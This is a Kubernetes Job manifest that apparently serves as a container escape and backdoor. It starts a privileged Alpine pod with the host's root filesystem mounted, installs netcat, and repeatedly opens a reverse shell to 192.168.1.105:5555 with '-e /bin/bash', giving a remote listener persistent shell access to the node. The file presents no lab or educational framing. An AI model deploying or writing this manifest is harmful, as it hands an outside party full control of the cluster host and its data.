apiVersion: batch/v1
kind: Job
metadata:
  name: netcat-job
spec:
  template:
    metadata:
      name: netcat-pod
    spec:
      containers:
        - name: netcat-container
          image: alpine
          command: ["/bin/sh", "-c"]
          args: ["apk add --no-cache netcat-openbsd && while true; do nc 192.168.1.105 5555 -e /bin/bash; sleep 60; done"]
          volumeMounts:
            - name: hostfs
              mountPath: /hostfs
          securityContext:
            privileged: true
      restartPolicy: Never
      volumes:
        - name: hostfs
          hostPath:
            path: /